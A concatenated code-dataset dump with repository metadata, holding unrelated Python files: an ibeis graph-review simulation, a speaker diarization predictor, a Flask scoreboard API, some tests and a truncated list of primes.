print('num inconsistent = %r' % (num,))
# is_recovering = infr.is_recovering()
if decision == POSTV:
if is_correct:
if not was_gt_pos:
infr.test_gt_pos_graph.add_edge(*edge)
elif was_gt_pos:
test_print("UNDID GOOD POSITIVE EDGE", color='darkred')
infr.test_gt_pos_graph.remove_edge(*edge)
is_within_gt = infr.test_gt_pos_graph.are_nodes_connected(*edge)
split_gt = is_within_gt != was_within_gt
if split_gt:
test_print("SPLIT A GOOD MERGE", color='darkred')
infr.test_state['n_true_merges'] -= 1
confusion = infr.test_state['confusion']
if confusion is None:
# initialize dynamic confusion matrix
# import pandas as pd
states = (POSTV, NEGTV, INCMP, UNREV, UNKWN)
confusion = {r: {c: 0 for c in states} for r in states}
# pandas takes a really long time doing this
# confusion = pd.DataFrame(columns=states, index=states)
# confusion[:] = 0
# confusion.index.name = 'real'
# confusion.columns.name = 'pred'
infr.test_state['confusion'] = confusion
if was_reviewed:
confusion[true_decision][prev_decision] -= 1
confusion[true_decision][decision] += 1
else:
confusion[true_decision][decision] += 1
test_action = None
action_color = None
if is_correct:
# CORRECT DECISION
if was_reviewed:
if prev_decision == decision:
test_action = 'correct duplicate'
action_color = 'darkyellow'
else:
infr.mistake_edges.remove(edge)
test_action = 'correction'
action_color = 'darkgreen'
if decision == POSTV:
if not was_within_gt:
test_action = 'correction redid merge'
action_color = 'darkgreen'
infr.test_state['n_true_merges'] += 1
else:
if decision == POSTV:
if not was_within_gt:
test_action = 'correct merge'
action_color = 'darkgreen'
infr.test_state['n_true_merges'] += 1
else:
test_action = 'correct redundant positive'
action_color = 'darkblue'
else:
if decision == NEGTV:
test_action = 'correct negative'
action_color = 'teal'
else:
test_action = 'correct uninferrable'
action_color = 'teal'
else:
action_color = 'darkred'
# INCORRECT DECISION
infr.mistake_edges.add(edge)
if was_reviewed:
if prev_decision == decision:
test_action = 'incorrect duplicate'
elif was_correct:
test_action = 'incorrect undid good edge'
else:
if decision == POSTV:
if was_within_pred:
test_action = 'incorrect redundant merge'
else:
test_action = 'incorrect new merge'
else:
test_action = 'incorrect new mistake'
infr.test_state['test_action'] = test_action
infr.test_state['pred_decision'] = decision
infr.test_state['true_decision'] = true_decision
infr.test_state['user_id'] = user_id
infr.test_state['recovering'] = (infr.recover_graph.has_node(edge[0]) or
infr.recover_graph.has_node(edge[1]))
infr.test_state['n_decision'] += 1
if user_id.startswith('algo'):
infr.test_state['n_algo'] += 1
elif user_id.startswith('user') or user_id == 'oracle':
infr.test_state['n_manual'] += 1
else:
raise AssertionError('unknown user_id=%r' % (user_id,))
test_print(test_action, color=action_color)
assert test_action is not None, 'what happened?'
class UserOracle(object):
def __init__(oracle, accuracy, rng):
if isinstance(rng, six.string_types):
rng = sum(map(ord, rng))
rng = ut.ensure_rng(rng, impl='python')
if isinstance(accuracy, tuple):
oracle.normal_accuracy = accuracy[0]
oracle.recover_accuracy = accuracy[1]
else:
oracle.normal_accuracy = accuracy
oracle.recover_accuracy = accuracy
# .5
oracle.rng = rng
oracle.states = {POSTV, NEGTV, INCMP}
def review(oracle, edge, truth, infr, accuracy=None):
feedback = {
'user_id': 'user:oracle',
'confidence': 'absolutely_sure',
'evidence_decision': None,
'meta_decision': NULL,
'timestamp_s1': ut.get_timestamp('int', isutc=True),
'timestamp_c1': ut.get_timestamp('int', isutc=True),
'timestamp_c2': ut.get_timestamp('int', isutc=True),
'tags': [],
}
is_recovering = infr.is_recovering()
if accuracy is None:
if is_recovering:
accuracy = oracle.recover_accuracy
else:
accuracy = oracle.normal_accuracy
# The oracle can get anything where the hardness is less than its
# accuracy
hardness = oracle.rng.random()
error = accuracy < hardness
if error:
error_options = list(oracle.states - {truth} - {INCMP})
observed = oracle.rng.choice(list(error_options))
else:
observed = truth
if accuracy < 1.0:
feedback['confidence'] = 'pretty_sure'
if accuracy < .5:
feedback['confidence'] = 'guessing'
feedback['evidence_decision'] = observed
if error:
infr.print(
'ORACLE ERROR real={} pred={} acc={:.2f} hard={:.2f}'.format(
truth, observed, accuracy, hardness), 2, color='red')
# infr.print(
# 'ORACLE ERROR edge={}, truth={}, pred={}, rec={}, hardness={:.3f}'.format(edge, truth, observed, is_recovering, hardness),
# 2, color='red')
return feedback
if __name__ == '__main__':
r"""
CommandLine:
python -m ibeis.algo.graph.mixin_simulation
python -m ibeis.algo.graph.mixin_simulation --allexamples
"""
import multiprocessing
multiprocessing.freeze_support() # for win32
import utool as ut # NOQA
ut.doctest_funcs()
| 40.224359
| 140
| 0.554475
|
69adbc05924f4ab3e8b2f53fd3e429a93e6296b3
| 1,124
|
py
|
Python
|
constants.py
|
MarcoFavorito/information-extraction-from-annotated-wikipedia
|
749f59c001d3850896431aaf0854c4c2ed209f1e
|
[
"MIT"
] | null | null | null |
constants.py
|
MarcoFavorito/information-extraction-from-annotated-wikipedia
|
749f59c001d3850896431aaf0854c4c2ed209f1e
|
[
"MIT"
] | null | null | null |
constants.py
|
MarcoFavorito/information-extraction-from-annotated-wikipedia
|
749f59c001d3850896431aaf0854c4c2ed209f1e
|
[
"MIT"
] | null | null | null |
# Some constants
NULL_BABELNET_ID = "NULL_BID"
NULL_TYPE = "NULL_T"
CUSTOM_TYPE = "CUSTOM_TYPE"
# XML tags
DISAMBIGUATED_ARTICLE_TAG = "disambiguatedArticle"
TEXT_TAG = "text"
ANNOTATIONS_TAG= "annotations"
ANNOTATION_TAG= "annotation"
BABELNET_ID_TAG = "babelNetID"
MENTION_TAG = "mention"
ANCHOR_START_TAG= "anchorStart"
ANCHOR_END_TAG = "anchorEnd"
TYPE_TAG = "type"
TEXT_TAG_IDX = 0
ANNOTATIONS_TAG_IDX = 1
ANNOTATION_TYPE_MSC = "MSC"
ANNOTATION_TYPE_HL = "HL"
ANNOTATION_TYPE_BABELFY = "BABELFY"
ANNOTATION_BABELNETID_TAG_POS = 0
ANNOTATION_MENTION_POS = 1
ANNOTATION_ANCHORSTART_POS = 2
ANNOTATION_ANCHOREND_POS = 3
ANNOTATION_TYPE_TAG_POS = 4
# POS tags
VERB_POSTAG = "VERB"
PROPN_POSTAG = "PROPN"
PRON_POSTAG = "PRON"
NOUN_POSTAG = "NOUN"
# dep tags
NSUBJ_DEPTAG = "nsubj"
NSUBJPASS_DEPTAG = "nsubjpass"
POBJ_DEPTAG = "pobj"
COBJ_DEPTAG = "cobj"
DOBJ_DEPTAG = "dobj"
ATTR_DEPTAG = "attr"
SPECIAL_DEP_TAGS = [NSUBJ_DEPTAG, NSUBJPASS_DEPTAG, POBJ_DEPTAG, ATTR_DEPTAG, COBJ_DEPTAG, DOBJ_DEPTAG]
SUBJ_DEPTAGS = [NSUBJ_DEPTAG, NSUBJPASS_DEPTAG]
OBJ_DEPTAGS = [POBJ_DEPTAG, ATTR_DEPTAG, COBJ_DEPTAG, DOBJ_DEPTAG]
| 22.938776
| 103
| 0.790036
|
cf3b426b68a61051ec225c59924c4e923b57a33b
| 4,012
|
py
|
Python
|
src/predict.py
|
WiraDKP/pytorch_speaker_embedding_for_diarization
|
61da1b7fe61111355f9329c7c0db20b2ecd0a411
|
[
"MIT"
] | 10
|
2020-03-24T10:34:15.000Z
|
2021-09-02T15:00:55.000Z
|
src/predict.py
|
WiraDKP/pytorch_speaker_embedding_for_diarization
|
61da1b7fe61111355f9329c7c0db20b2ecd0a411
|
[
"MIT"
] | 6
|
2020-08-28T20:22:41.000Z
|
2021-06-25T10:42:02.000Z
|
src/predict.py
|
WiraDKP/pytorch_speaker_embedding_for_diarization
|
61da1b7fe61111355f9329c7c0db20b2ecd0a411
|
[
"MIT"
] | 5
|
2020-04-23T09:46:28.000Z
|
2022-03-25T09:56:24.000Z
|
import os
import numpy as np
import matplotlib.pyplot as plt
import torch
from torch import onnx
from src.model import Encoder
from src.dataset import BaseLoad
from src.utils import zcr_vad, get_timestamp
from src.cluster import OptimizedAgglomerativeClustering
from openvino.inference_engine import IECore, IENetwork
class BasePredictor(BaseLoad):
def __init__(self, config_path, max_frame, hop):
config = torch.load(config_path)
self.device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
super().__init__(config.sr, config.n_mfcc)
self.ndim = config.ndim
self.max_frame = max_frame
self.hop = hop
@staticmethod
def _plot_diarization(y, spans, speakers):
c = y[0].cpu().numpy().copy()
for (start, end), speaker in zip(spans, speakers):
c[start:end] = speaker
plt.figure(figsize=(15, 2))
plt.plot(y[0], "k-")
for idx, speaker in enumerate(set(speakers)):
plt.fill_between(range(len(c)), -1, 1, where=(c==speaker), alpha=0.5, label=f"speaker_{speaker}")
plt.legend(loc="upper center", ncol=idx+1, bbox_to_anchor=(0.5, -0.25))
class PyTorchPredictor(BasePredictor):
def __init__(self, config_path, model_path, max_frame=45, hop=3):
super().__init__(config_path, max_frame, hop)
weight = torch.load(model_path, map_location="cpu")
self.model = Encoder(self.ndim).to(self.device)
self.model.load_state_dict(weight)
self.model.eval()
def predict(self, path, plot=False):
y = self._load(path, mfcc=False)
activity = zcr_vad(y)
spans = get_timestamp(activity)
embed = [self._encode_segment(y, span) for span in spans]
embed = torch.cat(embed).cpu().numpy()
speakers = OptimizedAgglomerativeClustering().fit_predict(embed)
if plot:
self._plot_diarization(y, spans, speakers)
timestamp = np.array(spans) / self.sr
return timestamp, speakers
def _encode_segment(self, y, span):
start, end = span
mfcc = self._mfcc(y[:, start:end]).to(self.device)
mfcc = mfcc.unfold(2, self.max_frame, self.hop).permute(2, 0, 1, 3)
with torch.no_grad():
embed = self.model(mfcc).mean(0, keepdims=True)
return embed
def to_onnx(self, outdir="model/openvino"):
os.makedirs(outdir, exist_ok=True)
mfcc = torch.rand(1, 1, self.n_mfcc, self.max_frame).to(self.device)
onnx.export(self.model, mfcc, f"{outdir}/diarization.onnx", input_names=["input"], output_names=["output"])
print(f"model is exported as {outdir}/diarization.onnx")
class OpenVINOPredictor(BasePredictor):
def __init__(self, model_xml, model_bin, config_path, max_frame=45, hop=3):
super().__init__(config_path, max_frame, hop)
net = IENetwork(model_xml, model_bin)
plugin = IECore()
self.exec_net = plugin.load_network(net, "CPU")
def predict(self, path, plot=False):
y = self._load(path, mfcc=False)
activity = zcr_vad(y)
spans = get_timestamp(activity)
embed = [self._encode_segment(y, span) for span in spans]
embed = np.vstack(embed)
speakers = OptimizedAgglomerativeClustering().fit_predict(embed)
if plot:
self._plot_diarization(y, spans, speakers)
timestamp = np.array(spans) / self.sr
return timestamp, speakers
def _encode_segment(self, y, span):
start, end = span
mfcc = self._mfcc(y[:, start:end])
mfcc = mfcc.unfold(2, self.max_frame, self.hop).permute(2, 0, 1, 3)
mfcc = mfcc.cpu().numpy()
embed = [self.exec_net.infer({"input": m}) for m in mfcc]
embed = np.array([e["output"] for e in embed])
embed = embed.mean(0)
return embed
| 37.495327
| 115
| 0.618893
|
92d54e4279b29667ea19aae7d50c3ce8ccc31df3
| 446
|
py
|
Python
|
backend/app.py
|
CSC510-Group-25/feature-hunt
|
27a0f52c8f7831e9e77db98d88f41d9fc1dab7ca
|
[
"MIT"
] | null | null | null |
backend/app.py
|
CSC510-Group-25/feature-hunt
|
27a0f52c8f7831e9e77db98d88f41d9fc1dab7ca
|
[
"MIT"
] | 147
|
2021-10-14T18:10:04.000Z
|
2021-11-30T01:36:42.000Z
|
backend/app.py
|
CSC510-Group-25/feature-hunt
|
27a0f52c8f7831e9e77db98d88f41d9fc1dab7ca
|
[
"MIT"
] | 8
|
2021-11-04T04:17:21.000Z
|
2021-11-26T12:53:52.000Z
|
# pylint: skip-file
# pylint: disable=pointless-string-statement,undefined-variable,line-too-long
from flask import Flask
from os import environ
from flask_cors import CORS
app = Flask(__name__)
from auth_controller import *
from products import *
from product_controller import *
from db_init import db
app.secret_key = "testing"
CORS(app)
#if __name__ == "__main__":
# app.run(debug=True, port=environ.get("PORT", 5000) , host='0.0.0.0')
| 24.777778
| 77
| 0.757848
|
b84a54dbc9057222f394b75fe104cfd15c74574b
| 2,710
|
py
|
Python
|
scoreboard/api.py
|
chrisx8/Ballzzz
|
0b3e914aa8c7db8320269461db14dd1b06a7f3e2
|
[
"MIT"
] | null | null | null |
scoreboard/api.py
|
chrisx8/Ballzzz
|
0b3e914aa8c7db8320269461db14dd1b06a7f3e2
|
[
"MIT"
] | 40
|
2020-02-18T23:31:17.000Z
|
2021-03-04T19:45:17.000Z
|
scoreboard/api.py
|
chrisx8/Ballzzz
|
0b3e914aa8c7db8320269461db14dd1b06a7f3e2
|
[
"MIT"
] | null | null | null |
import re
from flask_restful import Resource, reqparse
from models import Scoreboard
from views import DBSession, get_rankings
from sqlalchemy.orm.exc import NoResultFound
# Username legality check: 4-50 alphanumeric characters
USERNAME_REGEX = re.compile('^[a-zA-Z0-9._-]{4,50}$')
# accept and parse POST
score_parser = reqparse.RequestParser()
score_parser.add_argument('username',
help='Your username should contain 4-50 '
'characters, with only letters and numbers.',
required=True)
score_parser.add_argument('score',
help='This field is required', required=True)
# Score API
class PublishScore(Resource):
# GET: get the top 5
def get(self):
top_ten = dict()
# find all users, sorted by score
board = DBSession.query(Scoreboard).order_by(Scoreboard.score.desc()).all()
# find top five users if there's more than 5 users
if len(board) > 10:
for i in range(10):
# result contains username, score, ranking (handles ties)
top_ten[i] = self.build_user_data_json(board, i)
# otherwise find all users
else:
for i in range(len(board)):
# result contains username, score, ranking (handles ties)
top_ten[i] = self.build_user_data_json(board, i)
# close DB session
DBSession.close()
return top_ten, 200
# POST: submit score
def post(self):
data = score_parser.parse_args()
# Find if user already exists
try:
user_data = DBSession.query(Scoreboard).\
filter_by(username=data['username']).one()
# If the user's score in database is lower, update score
if user_data.score < int(data['score']):
user_data.score = data.score
# If user doesn't exist, create user and save score
except NoResultFound:
user_data = Scoreboard(username=data['username'],
score=int(data['score']))
DBSession.add(user_data)
# Commit change to DB
DBSession.commit()
# Find current ranking
board = DBSession.query(Scoreboard).order_by(Scoreboard.score.desc()).all()
# find index of user
index = board.index(user_data)
# close DB session
DBSession.close()
return self.build_user_data_json(board, index), 201
def build_user_data_json(self, board, i):
return {'username': board[i].username,
'score': board[i].score,
'ranking': get_rankings(board)[i]
}
| 38.169014
| 83
| 0.595203
|
0f63c792b7cf95a34167dc6b89da09c94c825a62
| 1,290
|
py
|
Python
|
examples/sync/exchange_client/derivative_exchange_rpc/11_Trades.py
|
InjectiveLabs/sdk-python
|
d98382d450f4e6043d8fc34b621215fb14f958f2
|
[
"Apache-2.0"
] | 10
|
2021-09-07T08:03:52.000Z
|
2022-03-08T08:39:30.000Z
|
examples/sync/exchange_client/derivative_exchange_rpc/11_Trades.py
|
InjectiveLabs/sdk-python
|
d98382d450f4e6043d8fc34b621215fb14f958f2
|
[
"Apache-2.0"
] | 39
|
2021-08-19T20:09:35.000Z
|
2022-03-22T19:51:59.000Z
|
examples/sync/exchange_client/derivative_exchange_rpc/11_Trades.py
|
InjectiveLabs/sdk-python
|
d98382d450f4e6043d8fc34b621215fb14f958f2
|
[
"Apache-2.0"
] | 5
|
2021-11-02T16:23:48.000Z
|
2022-01-20T22:30:05.000Z
|
# Copyright 2021 Injective Labs
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Injective Exchange API client for Python. Example only."""
import asyncio
import logging
from pyinjective.client import Client
from pyinjective.constant import Network
async def main() -> None:
network = Network.testnet()
client = Client(network, insecure=False)
market_id = "0x4ca0f92fc28be0c9761326016b5a1a2177dd6375558365116b5bdda9abc229ce"
subaccount_id = "0xc6fe5d33615a1c52c08018c47e8bc53646a0e101000000000000000000000000"
trades = client.get_derivative_trades(
market_id=market_id,
subaccount_id=subaccount_id
)
print(trades)
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
asyncio.get_event_loop().run_until_complete(main())
| 34.864865
| 88
| 0.766667
|
8baf83e3ab6b47b8a0055b8559611b793be935db
| 594
|
py
|
Python
|
butter_hopper/headers.py
|
cswl/butter-hopper
|
8797221e0ffe3ab8000952f62edb88bb53a660b0
|
[
"MIT"
] | 8
|
2019-02-12T23:39:58.000Z
|
2021-08-11T22:30:59.000Z
|
butter_hopper/headers.py
|
cswl/butter-hopper
|
8797221e0ffe3ab8000952f62edb88bb53a660b0
|
[
"MIT"
] | null | null | null |
butter_hopper/headers.py
|
cswl/butter-hopper
|
8797221e0ffe3ab8000952f62edb88bb53a660b0
|
[
"MIT"
] | null | null | null |
from munch import Munch
from pathlib import Path
MOUNT_HEADERS = Munch({
"BTRFSROOT_TARGET": 'broot',
"UUID": "uuid",
"PARTUUID": "puuid",
"TYPE": "type",
"AUTO": "auto",
"SUBVOL": "subvol",
"TARGET": "mountpoint",
"OPTIONS": "options",
"UDISKS_TARGET": "udisks2"
})
BASE_PATHS = Munch({})
BASE_PATHS.run = Path('/run/mount')
BASE_PATHS.base = BASE_PATHS.run.joinpath('butter_hop')
BASE_PATHS.dlinks = BASE_PATHS.base.joinpath("distros")
BASE_PATHS.root = BASE_PATHS.run.joinpath("butter_realroot")
BASE_PATHS.distros = BASE_PATHS.root.joinpath("distros")
| 27
| 60
| 0.681818
|
f55bc8b945b6af8e21ca1ca1ddbf407188ab2b1e
| 797
|
py
|
Python
|
ServidorPython/python32_web/Lib/site-packages/sklearn/utils/tests/test_show_versions.py
|
mak213k/Servidor_automatizado_python
|
4403ef8027a2f814220baacc95856cf5fbf01d21
|
[
"MIT"
] | 25
|
2019-03-08T01:03:03.000Z
|
2022-02-14T17:38:32.000Z
|
venv/lib/python3.7/site-packages/sklearn/utils/tests/test_show_versions.py
|
John1001Song/Big-Data-Robo-Adviser
|
9444dce96954c546333d5aecc92a06c3bfd19aa5
|
[
"MIT"
] | 12
|
2021-03-09T03:01:16.000Z
|
2022-03-11T23:59:36.000Z
|
venv/lib/python3.7/site-packages/sklearn/utils/tests/test_show_versions.py
|
John1001Song/Big-Data-Robo-Adviser
|
9444dce96954c546333d5aecc92a06c3bfd19aa5
|
[
"MIT"
] | 31
|
2019-01-15T20:16:50.000Z
|
2022-03-01T05:47:38.000Z
|
from sklearn.utils._show_versions import _get_sys_info
from sklearn.utils._show_versions import _get_deps_info
from sklearn.utils._show_versions import show_versions
def test_get_sys_info():
sys_info = _get_sys_info()
assert 'python' in sys_info
assert 'executable' in sys_info
assert 'machine' in sys_info
def test_get_deps_info():
deps_info = _get_deps_info()
assert 'pip' in deps_info
assert 'setuptools' in deps_info
assert 'sklearn' in deps_info
assert 'numpy' in deps_info
assert 'scipy' in deps_info
assert 'Cython' in deps_info
assert 'pandas' in deps_info
def test_show_versions_with_blas(capsys):
show_versions()
out, err = capsys.readouterr()
assert 'python' in out
assert 'numpy' in out
assert 'BLAS' in out
| 24.151515
| 55
| 0.734003
|
90388d161204584ad978af006898cacebcf8d4a6
| 1,252
|
py
|
Python
|
tensor2tensor/rl/model_rl_experiment_test.py
|
repoloper/tensor2tensor
|
2fd91d34b8e6d79599c0612e446175174e838b9d
|
[
"Apache-2.0"
] | 61
|
2018-06-23T01:40:58.000Z
|
2021-06-07T09:33:38.000Z
|
tensor2tensor/rl/model_rl_experiment_test.py
|
zhaopufeng/tensor2tensor
|
7bb67a18e1e4a0cddd1d61c65c937f14c1c124e3
|
[
"Apache-2.0"
] | null | null | null |
tensor2tensor/rl/model_rl_experiment_test.py
|
zhaopufeng/tensor2tensor
|
7bb67a18e1e4a0cddd1d61c65c937f14c1c124e3
|
[
"Apache-2.0"
] | 8
|
2018-10-23T13:10:12.000Z
|
2019-07-31T05:53:08.000Z
|
# coding=utf-8
# Copyright 2018 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tiny run of model_rl_experiment. Smoke test."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensor2tensor.rl import model_rl_experiment
import tensorflow as tf
FLAGS = tf.flags.FLAGS
class ModelRLExperimentTest(tf.test.TestCase):
def test_basic(self):
FLAGS.output_dir = tf.test.get_temp_dir()
FLAGS.loop_hparams_set = "rl_modelrl_tiny"
FLAGS.loop_hparams = "generative_model_params=next_frame_tiny"
FLAGS.schedule = "train" # skip evaluation for world model training
model_rl_experiment.main(None)
if __name__ == "__main__":
tf.test.main()
| 32.102564
| 74
| 0.771565
|
f0390f8ed8e8b2d3e4a3ef576330872cea08f7d6
| 230
|
py
|
Python
|
helpers/vline_down.py
|
nuzcraft/RLTut
|
b763de87ee49abd413a7c3a278c004803ab45663
|
[
"MIT"
] | 2
|
2018-01-05T08:09:37.000Z
|
2018-01-05T20:39:18.000Z
|
helpers/vline_down.py
|
nuzcraft/RLTut
|
b763de87ee49abd413a7c3a278c004803ab45663
|
[
"MIT"
] | null | null | null |
helpers/vline_down.py
|
nuzcraft/RLTut
|
b763de87ee49abd413a7c3a278c004803ab45663
|
[
"MIT"
] | null | null | null |
# draws a vertical line down on a map
import variables as var
def vline_down(map, x, y):
while y < var.MAP_HEIGHT and map[x][y].blocked:
map[x][y].blocked = False
map[x][y].block_sight = False
y += 1
| 23
| 51
| 0.608696
|
add0da64d20442dd1dd862e69dff6b881461037b
| 2,057
|
py
|
Python
|
tests/run/test_train.py
|
cosmoquester/speech-recognition
|
c9f137a7fe23548435d7f20d87b60522697218b5
|
[
"Apache-2.0"
] | 6
|
2021-05-06T10:14:19.000Z
|
2022-03-03T19:30:50.000Z
|
tests/run/test_train.py
|
ModuASR/speech-recognition
|
81bcf274407377dd785d204f5622c8747c33ea0f
|
[
"Apache-2.0"
] | 14
|
2021-05-02T08:21:18.000Z
|
2021-06-13T11:37:24.000Z
|
tests/run/test_train.py
|
cosmoquester/speech-recognition
|
c9f137a7fe23548435d7f20d87b60522697218b5
|
[
"Apache-2.0"
] | 2
|
2021-05-04T13:46:13.000Z
|
2021-05-12T07:29:06.000Z
|
import os
import random
import tempfile
import pytest
from speech_recognition.configs import TrainConfig
from speech_recognition.run.train import main, parser
from ..const import (
DEFAULT_LIBRI_CONFIG,
SP_MODEL_LIBRI,
TEST_DS_CONFIG,
TEST_LAS_CONFIG,
TFRECORD_DATASET_PATH,
WAV_DATASET_PATH,
)
@pytest.mark.interferable
@pytest.mark.parametrize("mixed_precision", [False, True])
@pytest.mark.parametrize("model_config_path", [TEST_LAS_CONFIG, TEST_DS_CONFIG])
def test_train(model_config_path, mixed_precision):
max_over_policy = random.choice([None, "slice", "filter"])
use_tfrecord = random.choice([True, False])
with tempfile.TemporaryDirectory() as tmpdir:
arguments = [
"--data-config",
DEFAULT_LIBRI_CONFIG,
"--model-config",
model_config_path,
"--sp-model-path",
SP_MODEL_LIBRI,
"--train-dataset-paths",
TFRECORD_DATASET_PATH if use_tfrecord else WAV_DATASET_PATH,
"--dev-dataset-paths",
TFRECORD_DATASET_PATH if use_tfrecord else WAV_DATASET_PATH,
"--output-path",
tmpdir,
"--steps-per-epoch",
"2",
"--epochs",
"1",
"--shuffle-buffer-size",
"30",
"--device",
"CPU",
"--batch-size",
"2",
"--dev-batch-size",
"2",
"--learning-rate",
"1e-3",
"--train-dataset-size",
"1",
]
if mixed_precision:
arguments.append("--mixed-precision")
if use_tfrecord:
arguments.append("--use-tfrecord")
if max_over_policy is not None:
arguments.extend(["--max-over-policy", max_over_policy])
assert main(TrainConfig(**vars(parser.parse_args(arguments)))) is None
assert os.path.exists(os.path.join(tmpdir, "logs", "train"))
assert os.path.exists(os.path.join(tmpdir, "models", "checkpoint"))
| 30.25
| 80
| 0.584832
|
46b45a4f0ec35e909f04c07cf661933aced73c0a
| 57,480
|
py
|
Python
|
notebooks/primes.py
|
felipessalvatore/it
|
82916dc96bbc4630dfe1d0ba6cf9972394da8771
|
[
"MIT"
] | null | null | null |
notebooks/primes.py
|
felipessalvatore/it
|
82916dc96bbc4630dfe1d0ba6cf9972394da8771
|
[
"MIT"
] | null | null | null |
notebooks/primes.py
|
felipessalvatore/it
|
82916dc96bbc4630dfe1d0ba6cf9972394da8771
|
[
"MIT"
] | null | null | null |
primes = [2,3,5,7,11,13,17,19,23,29,31,37,41,43,47,53,59,61,67,71,73,79,83,89,97,101,103,107,109,113,127,131,137,139,149,151,157,163,167,173,179,181,191,193,197,199,211,223,227,229,233,239,241,251,257,263,269,271,277,281,283,293,307,311,313,317,331,337,347,349,353,359,367,373,379,383,389,397,401,409,419,421,431,433,439,443,449,457,461,463,467,479,487,491,499,503,509,521,523,541,547,557,563,569,571,577,587,593,599,601,607,613,617,619,631,641,643,647,653,659,661,673,677,683,691,701,709,719,727,733,739,743,751,757,761,769,773,787,797,809,811,821,823,827,829,839,853,857,859,863,877,881,883,887,907,911,919,929,937,941,947,953,967,971,977,983,991,997,1009,1013,1019,1021,1031,1033,1039,1049,1051,1061,1063,1069,1087,1091,1093,1097,1103,1109,1117,1123,1129,1151,1153,1163,1171,1181,1187,1193,1201,1213,1217,1223,1229,1231,1237,1249,1259,1277,1279,1283,1289,1291,1297,1301,1303,1307,1319,1321,1327,1361,1367,1373,1381,1399,1409,1423,1427,1429,1433,1439,1447,1451,1453,1459,1471,1481,1483,1487,1489,1493,1499,1511,1523,1531,1543,1549,1553,1559,1567,1571,1579,1583,1597,1601,1607,1609,1613,1619,1621,1627,1637,1657,1663,1667,1669,1693,1697,1699,1709,1721,1723,1733,1741,1747,1753,1759,1777,1783,1787,1789,1801,1811,1823,1831,1847,1861,1867,1871,1873,1877,1879,1889,1901,1907,1913,1931,1933,1949,1951,1973,1979,1987,1993,1997,1999,2003,2011,2017,2027,2029,2039,2053,2063,2069,2081,2083,2087,2089,2099,2111,2113,2129,2131,2137,2141,2143,2153,2161,2179,2203,2207,2213,2221,2237,2239,2243,2251,2267,2269,2273,2281,2287,2293,2297,2309,2311,2333,2339,2341,2347,2351,2357,2371,2377,2381,2383,2389,2393,2399,2411,2417,2423,2437,2441,2447,2459,2467,2473,2477,2503,2521,2531,2539,2543,2549,2551,2557,2579,2591,2593,2609,2617,2621,2633,2647,2657,2659,2663,2671,2677,2683,2687,2689,2693,2699,2707,2711,2713,2719,2729,2731,2741,2749,2753,2767,2777,2789,2791,2797,2801,2803,2819,2833,2837,2843,2851,2857,2861,2879,2887,2897,2903,2909,2917,2927,2939,2953,2957,2963,2969,2971,2999,3001,3011,3019,3023,3037,3041,3049,3061,3067,3079,3083,3089,3109,3119,3121,3137,3163,3167,3169,3181,3187,3191,3203,3209,3217,3221,3229,3251,3253,3257,3259,3271,3299,3301,3307,3313,3319,3323,3329,3331,3343,3347,3359,3361,3371,3373,3389,3391,3407,3413,3433,3449,3457,3461,3463,3467,3469,3491,3499,3511,3517,3527,3529,3533,3539,3541,3547,3557,3559,3571,3581,3583,3593,3607,3613,3617,3623,3631,3637,3643,3659,3671,3673,3677,3691,3697,3701,3709,3719,3727,3733,3739,3761,3767,3769,3779,3793,3797,3803,3821,3823,3833,3847,3851,3853,3863,3877,3881,3889,3907,3911,3917,3919,3923,3929,3931,3943,3947,3967,3989,4001,4003,4007,4013,4019,4021,4027,4049,4051,4057,4073,4079,4091,4093,4099,4111,4127,4129,4133,4139,4153,4157,4159,4177,4201,4211,4217,4219,4229,4231,4241,4243,4253,4259,4261,4271,4273,4283,4289,4297,4327,4337,4339,4349,4357,4363,4373,4391,4397,4409,4421,4423,4441,4447,4451,4457,4463,4481,4483,4493,4507,4513,4517,4519,4523,4547,4549,4561,4567,4583,4591,4597,4603,4621,4637,4639,4643,4649,4651,4657,4663,4673,4679,4691,4703,4721,4723,4729,4733,4751,4759,4783,4787,4789,4793,4799,4801,4813,4817,4831,4861,4871,4877,4889,4903,4909,4919,4931,4933,4937,4943,4951,4957,4967,4969,4973,4987,4993,4999,5003,5009,5011,5021,5023,5039,5051,5059,5077,5081,5087,5099,5101,5107,5113,5119,5147,5153,5167,5171,5179,5189,5197,5209,5227,5231,5233,5237,5261,5273,5279,5281,5297,5303,5309,5323,5333,5347,5351,5381,5387,5393,5399,5407,5413,5417,5419,5431,5437,5441,5443,5449,5471,5477,5479,5483,5501,5503,5507,5519,5521,5527,5531,5557,5563,5569,5573,5581,5591,5623,5639,5641,5647,5651,5653,5657,5659,5669,5683,5689,5693,5701,5711,5717,5737,5741,5743,5749,5779,5783,5791,5801,5807,5813,5821,5827,5839,5843,5849,5851,5857,5861,5867,5869,5879,5881,5897,5903,5923,5927,5939,5953,5981,5987,6007,6011,6029,6037,6043,6047,6053,6067,6073,6079,6089,6091,6101,6113,6121,6131,6133,6143,6151,6163,6173,6197,6199,6203,6211,6217,6221,6229,6247,6257,6263,6269,6271,6277,6287,6299,6301,6311,6317,6323,6329,6337,6343,6353,6359,6361,6367,6373,6379,6389,6397,6421,6427,6449,6451,6469,6473,6481,6491,6521,6529,6547,6551,6553,6563,6569,6571,6577,6581,6599,6607,6619,6637,6653,6659,6661,6673,6679,6689,6691,6701,6703,6709,6719,6733,6737,6761,6763,6779,6781,6791,6793,6803,6823,6827,6829,6833,6841,6857,6863,6869,6871,6883,6899,6907,6911,6917,6947,6949,6959,6961,6967,6971,6977,6983,6991,6997,7001,7013,7019,7027,7039,7043,7057,7069,7079,7103,7109,7121,7127,7129,7151,7159,7177,7187,7193,7207,7211,7213,7219,7229,7237,7243,7247,7253,7283,7297,7307,7309,7321,7331,7333,7349,7351,7369,7393,7411,7417,